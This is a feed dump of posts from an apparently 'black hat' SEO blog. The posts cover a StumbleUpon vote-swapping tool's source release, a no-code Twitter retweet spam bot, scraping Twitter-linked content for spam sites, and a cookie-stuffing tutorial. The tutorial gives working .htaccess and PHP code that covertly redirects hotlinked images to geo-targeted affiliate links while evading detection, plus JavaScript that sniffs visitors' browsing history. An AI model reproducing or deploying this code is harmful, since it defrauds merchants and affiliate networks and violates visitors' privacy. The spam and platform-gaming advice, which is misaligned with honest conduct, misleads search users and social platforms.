Black Hat – Digerati Marketing Sat, 27 Feb 2016 18:39:59 +0000 en-US hourly 1 Autostumble Source Code Released Mon, 01 Feb 2010 21:34:32 +0000 As long time readers will know, I released Autostumble back in April 2008 (wow, yes coming up two years ago). At the time, it absolutely wtfpwned StumbleUpon and our network delivered just under half a million vote swaps.

The program went through a few versions, having various features added on the way and multiple fixes as StumbleUpon desperately tried to keep its pants up. The final (version 4, which was fixed in such a hurry it came out the factory with “v3” still plastered on) was the last incarnation of the application.

Unfortunately, the time taken to monitor the network, answer support e-mails and keep the fixes coming was consuming more time than I ever intended. I worked with another dev to get an online version up, but that never got to a stable launch, so the whole thing basically gathered dust.

So three things:

1) I’ve released the Autostumble source code for download for anyone that wants to have a crack at reverse engineering it.

2) For those that can’t code There is actually a really nice copy of Autostumble which works, that is currently doing pretty well from what I can see. It also has a function to add reviews, which AutoStumble never had. So, if you still want to swap some stumbles, that’s the place to go.

3) I talked to the guy that runs it, and he has arranged this voucher code for old Autostumble users: AutoStumbleOld

Enter that code and you’ll get a pretty nice $20 off.

I’ve been working hard with the development team at the full-time SEO company I work at to develop some really nice apps for the SEO world, which shall be surfacing in Q2 of 2010. It’s really surprising what you can achieve when you have a team of full-time developers to help.

Anyway for now:

Coders can get Autostumble source code.

Marketers can get a working Autostumble type program.

This is all. [insert vague promising of posting more here].

]]> 6
Does Blackhat SEO still work? Mon, 07 Dec 2009 11:30:04 +0000 If anyone tells you blackhat SEO doesn’t work, get them to comment on this.

]]> 13
How to make a Twitter bot with no coding Wed, 23 Sep 2009 21:47:27 +0000 As usual, lazy-man post overview:

With this post you can learn to make a Twitter bot that will automatically retweet users talking about keywords that you specify. You can achieve this with (just about) no coding whatsoever.

Why would you want to do this? Lots of reasons I guess, ranging from spammy to fairly genuine. Normally giving somebody a ReTweet is enough to make them follow you and it keeps your profile active, so you can semi-automate accounts and use it as an aide for making connections. That or you can spam the sh*t out of Twitter, whatever takes your fancy really.

Here we go.

Step 1: Make your Twitter Bot account
Head over to and create a new account for your bot. Shouldn’t really need much help at this stage.. Try to pick a nice name and cute avatar. Or something.

Step 2: Find conversations you want to Retweet
Okay, we’ve got our Twitter account and we’re going to need to scan twitter for conversations to possibly retweet. To do this, we’re going to use Twitter Search. In this example, we’re going to search for “SEO Tips”, but to stop our bot Retweeting itself you want to add a negative keyword of your botname. So search for SEO Tips -botname, likely this:

Twitter Bot

So my bot is called “DigeratiTestBot”. Hit search now, muffin.

Step 3: Getting the feed
The next thing you need to do is get the feed results, which isn’t quite as simple as you’d think you see. Twitter being a bit of a prude doesn’t like bots and services like Feedburner or Pipes interacting with it, so you’re going to need to repurpose the feed or it’s game over for you.

After you’ve done your search you need to get the feed location (top right) so copy the URL of the “Feed for this query”

Twitter Bot

Store that in a safe place, we’ll need it in a second.

Step 4: Making the feed accessible
Okay, so there’s a teeny-tiny bit of code, but this is all, I promise! You’re going to need to republish the feed so it can be accessed later on, but don’t worry – it’s a piece of cake. All we’re going to do is screen scrape the whole feed results page onto our own server.

Make a file called “myfeed.php” and put this in it:

$url = "";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$curl_scraped_page = curl_exec($ch);
echo $curl_scraped_page;

The only bit you need to change is:

“$url = “”;”

which needs to be replaced with whatever your Twitter RSS feed that we carefully saved and stored in a safe place earlier. If you’ve already lost that URL, please proceed back to Step 3 and consider yourself a fail.

So, having completed this and uploaded your myfeed.php to your domain, you can now access the real-time Twitter results feed by accessing

Step 5: Yahoo Pipes!
Now comes the fun bit, we’re going to set up most of the mechanism for our bot in Yahoo Pipes. You’ll need a Yahoo account, so if you don’t have one, get one and login and click “Create a Pipe” at the top of the screen.

This will give you a blank canvas, so let’s MacGyver us up a god damn Twitter Bot!

Add “Fetch Feed” block from “Sources”
Then in the “URL” field, enter the URL of the feed we repurposed,

Twitter Bot

Add “Filter” block from “Operators”
Leave the settings as “Block” and “all” then add the following rules:
item.title CONTAINS RT.*RT
item.title CONTAINS @
item.twitter:lang DOES NOT CONTAIN EN

(You click the little green + to add more rules). Once you’ve done that drag a line between the bottom of the “Feed Fetch” box and the top of the “Filter” box to connect them. Hey presto.

Twitter Bot

Add “Loop” block from “Operators”

Add a “String Builder” from “String” and drag in ONTO the “Loop” block you just added

In the String Builder block you just put inside the Loop block, add these 3 items:

Check the radio box of “assign results to” and change this to item.title

Great, now drag a connection between your Filter and Loop blocks. Should look like this now:

Twitter Bot

Add “Regex” block from “Operators”
Add these two rules:
item.title REPLACE WITH RT @
item.title REPLACE 2009 WITH (space character)

Extra points for anyone who writes “(space character)” instead of using a space. Also don’t miss the trailing slash from

Drag a connection between Loop Block and Regex Block, then a connection between Regex and Pipe Output blocks.

Finished! Should look something like this:

Twitter Bot

All you need to do now is Save your pipe (name it whatever you like) and Run Pipe (at the top of the screen).

Once you run your pipe, you’ll get an output screen something like this:

Twitter Bot

What you need to do here is save the URL of your pipe’s RSS feed and keep it in a safe place. If you didn’t lose your RSS feed from Step 3, then I’d suggest keeping it in the same place as that.

Step 6: TwitterFeed
Almost there, comrades. All we need to do now is whack our feed into our TwitterBot account, which is made really easy with Get yourself over there and sign up for an account.

To set up your bot in TwitterFeed:

1) I suggest not using oauth, as it will make it easer to use multiple Twitter accounts. Click the “Having Oauth Problems?” link and enter the username and password for your TwitterBot account and hit test account details.

2) Name your feed whatever you like and then enter the URL of your Yahoo Pipes RSS that we carefully saved earlier, then hit “test feed”.

3) Important: Click “Advanced Settings” we need to change some stuff here:

Post Frequency: Every 30mins
Updates at a time: 5
Post Content: Title Only
Post Link: No (uncheck)

Then hit “Create Feed”

Twitter Bot

All done!

Have fun and please, don’t buy anything from those losers who are peddling $20 “automate this” Twitter scripts. If you really need to do it, just make it yourself or if you don’t know how leave a comment here and I’ll show you how.


]]> 115
Geo-Targeted Image Based Cookie Stuffing Thu, 16 Jul 2009 21:32:52 +0000 People are lazy so I write this first
This (research) based post will demonstrate the techniques behind stuffing affiliate cookies via images, on any website you can post images (think forums), how to get other people to do this for you and how to geographically target cookie stuffing.

Zonk. Back in 2007 I did a post about making money with affiliates by cookie stuffing. While nobody admits to cookie stuffing, it turns out you’re all lying shits as that post gets more search traffic than anything else.

Personally, I think cookie stuffing is low, I wouldn’t recommend it or condone it. It’s probably illegal (ebay certainly think so) and you’ll probably go to hell in the afterlife.

Oh, you’ll probably get caught too if you used lame iframe techniques, so for research purposes only I want to explain how to turn cookie stuffing up a notch, if you were silly enough to do such a thing.

iFrames are so 1990s
I’d be quite happy never to see an iframe again, even though I’m sure there’s going to be a rebirth as SEOmoz said it was a possible route to sculpt pagerank after the no-follow actually doesn’t sculpt anything admission from Mr. Cutts.

Yea, so don’t use them.

Serving cookies through images
You can actually serve cookies through images (sort of). It’s a lot more sneaky and it means you can essentially serve a cookie to anywhere you can post HTML.

I’ve seen people propagate this by encouraging people to hotlink as well. So for instance, auto-generating a celebrity photo gallery and offering embed codes. Visitors merrily go about posting images all over the web while they are secretly serving cookies.

So there’s a mechanism to automatically propagate cookies all over the interwebs.

Geo-targeting cookie stuffing
Conversion rate is one (of a few) indicators that are watched to try and rumble cookie stuffers. You need to do everything you can to make sure your conversion rate is as high as possible. So, let’s start with geo-targeting. It’s no good serving cookies to Americans for ebay UK or serving cookies for Italians. You get the idea. So detecting what country your visitor is from and serving the correct cookie increases your chance of a cookie stuff vs conversion.

Cookie stuffing images with .htaccess
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.

The below .htaccess file will grab requests that do not originate from your site or search bots and pass them to a serveimage php file.

Options +FollowSymLinks 

RewriteEngine on 

# Let's not cookie stuff our own visitors!

RewriteCond %{HTTP_REFERER} !^$ [NC]

# If the request is outside of your site

RewriteCond %{HTTP_REFERER} !^http://([^.]+\.)?mywebsite\.com/ [NC]

# If the request is not from a few bots (pretty basic, add to this!)

RewriteCond %{HTTP_USER_AGENT} !(googlebot-image|msnbot|psbot|yahoo-mmcrawler) [NC]

# Grab the image name, extension type, go to our serveimage.php file

RewriteRule ^images/([a-zA-Z0-9]+).(bmp|gif|jpe?g|png)$ /serveimage.php?img=$1&ext=$2 [L]

Cookie stuffing images with PHP
So now we’re passing image requests to serveimage.php, you need to have the following in place:


//Get the image name from request
$ext = $_GET['ext'];
$path = "images/".$_GET['img'].".".$_GET['ext'];

// Decide if we should stuff our lucky visitor with a cookie

//Let's generate a random number
$rand = mt_rand(0, 1000); 

// See if it is a lucky request
// You can change percentage by changing $rand<??; 5=0.5%, 10=1%, 100=10% etc
// 10% chance to serve cookie instead of image

if ($rand<100) { cookie_stuff(); } else {spit_it_out($ext,$path);}


// Forget it - serve them an image!

function spit_it_out($ext, $path) {
header("Cache-Control: no-cache");
header("Pragma: no-cache");
if ($ext=='jpeg'|$ext=='jpg') {
header("Content-type: image/jpeg");
} else if ($ext=='gif') {
header("Content-type: image/gif");
} else if ($ext=='bmp') {
header("Content-type: image/bmp");
} else {
header("Content-type: image/png");
readfile('http://'.$_SERVER["SERVER_NAME"].'/'.$path) or die("error!");

// We have a winner! Stuff a cookie
function cookie_stuff() {
if (isset($ip)) {

// Work out what country they are in
$country = file_get_contents("$ip"); } else {$country="US";}
if ($country=="UK") {
header('Location: http://YOUR-UKAFFILIATE-LINK'); //UK
elseif ($country=="CA") {
header('Location: http://YOUR-CANADA-AFFILIATE-LINK'); //CANADA
else {
header('Location: YOUR-USA-AFFILIATE-LINK'); //US

// Add as many countries as you want:



So this PHP code will take your hotlinker, and 10% of the time stuff an affiliate cookie for the correct country and 90% of the time correctly serve the image.

You can add as many country codes as you like, you can get a list from WorldAtlas.

I’ve personally seen people make over £1,000 per day when they get creative with cookies, obviously the deeper you stick your hand in the cookie jar, the more likely you are to get caught.

Other security measures and improvements
As the more astute among you have no doubt realised, big boy sites have more layers for detecting cookie stuffing, such as:

1) What page do people land on (always the same page being hit?)

2) How long do they stay on the site on average

3) How many / which pages do they view

4) Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie

Some of the basic stuff like user agent / IP are covered in this script, but on any scale you’d need to tackle the above issues. Yes, it’s totally possible – just remember, if a human can do it in a browser, you can write a script to do it as well.

Get creative – check the browser history

If you want to raise conversion rates even further, you can check that they’ve visited the site you want to cookie stuff for. If they’ve previously visited the site, it’s much more likely they’ve got an account and are likely to buy.

Here’s some Javascript to check user history (I didn’t write this one)

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

  var d = document.createElement('div'); = 'xss_flag';

  var d = document.createElement('table');
  d.border = 0;
  d.cellpadding = 5;
  d.cellspacing = 10;
  d.width = '90%';
  d.align = 'center'; = 'data';

  for (var i = 0; i <>');

  /* launch steal history */

if (is_mozilla) {


function stealHistory() {

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {          
         var link = document.createElement("a");        = "id" + i;       
         link.href = websites[i];       
         link.innerHTML = websites[i];              
         var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");       
// check for visited       
     if (color == "rgb(0, 0, 255)") {           
         document.write('' + websites[i] + '');
      } // end visited check
  } // end visited website loop

} // end stealHistory method

I hope this post helps merchants and affiliate networks everywhere to tackle cookie stuffers. I’ll do a followup at some point explaining how to mimic user browsing behavior properley.

End thought: Web based e-mail clients can also load images. Chain mails still do well…..

]]> 17
Using Twitter To Power Spam Tue, 03 Mar 2009 20:55:59 +0000 Good afternoon and a happy square root day to you. (C’mon it’s no more made up than Valentine’s Day).

Despite my initial reservations, I’m actually finding Twitter moderately useful for content and link discovery, the trick is just really following the right people and ditching time wasters. I’m not going to bore you with a lecture on how Twitter is the next big thing, in fact I’m pretty sure we’re fast approaching the point at which Gartner’s Hype Cycles soon predict a crash of interest and disillusionment.

Twitter in the Gartner's Hype Cycle

Well, maybe, maybe not – argue it amongst yourselves, it’s not what I really want to talk about. I want to talk about…

Twitter and Spam
Although I’ve only really talked about parasite hosting indirectly, when looking at ranking factors to do with age and trust, I think it’s a point briefly worth mentioning.

I saw Quadzilla posted today about parasite hosting on twitter. Hopefully, that hasn’t eluded you, aside from other methods of finding places to parasite host all you need to look for are trusted domains that allow you to post content with little moderation. Even a basic search for Viagra shows that the #2 position is essentially a parasite hosted page on the hotfroguk directory (thanks Ryan for your dedication in trawling Viagra results).

As Quadzilla rightly points out, with Twitter being almost totally unmoderated, the sad fact is it’s going to get bombed to hell over the next 12 months by blackhat SEOs and then Google will do something about it and game over.

There are however (slightly) more legitimate uses for Twitter if you’ve got your heart set on some easy rankings.

Twitter and content generation
Content generation can be a tricky game, you can plain scrape it (not really generation :P), scrape it and spin it, you can use synonym replacement, markov chaining, or if you’re really smart – come up with your own way to do it.

There are several problems inherited with content generation, whether it’s duplicate content, poor quality or your algorithm gets skewed by internet random. I’ve seen a lot of people trying to generate websites based on data they can pull from keyword trends or “hot” trends. The problem is that most of the services give you the information you need, after the fact. The news has come, the search spike has been and you’re content generation system has given you a crummy bit of content which now has to compete with established sites with real content. Oh, and the fact nobody cares anymore.

Twitter, on the other hand is instant. It’s not uncommon for me to discover new “hot” things on twitter hours before mainstream news (i.e. authoritative sites) publish it (and days before Seth Godin makes an informed in hindsight) comment.

Without spoon feeding, I put this to you: Why not let tweeting twits find your content for you? There’s many ways you can do this:

1) There are lovely people that get this information for you. For instance: will give you the most tweeted links. There’s all your early breaking generic news for you, just set your cURL bot to follow those tinyurls and discover the source and scrape away.

2) If you’re in a niche, find everyone who tweets in that niche, use cURL to crawl of the links they tweet, log them to a database, use a little intelligent keyword selection to make sure their relevant, then repost.

Then of course, ping the world with your new content, break some captchas and submit to a list of social sites and drop a few links here and there. Aside from services such as Google Blog Search, which work on an almost exclusively chronological basis, you stand a good chance of getting a healthy amount of visitors since you’re one of the first few to get content up.

Added note for clarity: I’m talking about scraping titles/content from URLs you have followed from tweets – not tweets themselves. The majority of the links to new breaking / interesting stories will come inside a very small window. So if you can post this content up while there is still interest / searches and before someone has link dominance, you should even be able to give the duplicate content penalty the slip, even if you’ve 100% scraped – so you’re on a winner – you could even retweet it (:

Oh, don’t forget to jam it full or ads or something. Who cares? It’s all automated. Think of it at least as a weekend project, but don’t break Twitter, it’s growing on me (:

]]> 5